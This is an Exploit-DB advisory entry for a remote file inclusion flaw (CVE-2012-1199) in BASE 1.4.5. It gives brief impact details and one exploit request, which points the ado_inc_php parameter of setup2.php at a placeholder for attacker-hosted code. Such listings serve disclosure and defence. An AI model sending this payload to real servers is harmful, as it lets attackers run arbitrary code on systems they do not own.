Basic Analysis and Security Engine BASE 1.4.5 setup/setup2.php ado_inc_php Parameter Remote File Inclusion

2012-02-11T00:00:00
ID EDB-ID:36723
Type exploitdb
Reporter indoushka
Modified 2012-02-11T00:00:00

Description

Basic Analysis and Security Engine (BASE) 1.4.5 setup/setup2.php ado_inc_php Parameter Remote File Inclusion. CVE-2012-1199. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/51979/info
                     
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
                     
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
                     
BASE 1.4.5 is vulnerable; other versions may be affected.

Exploit: http://www.example.com/base/setup/setup2.php?ado_inc_php=[EV!L]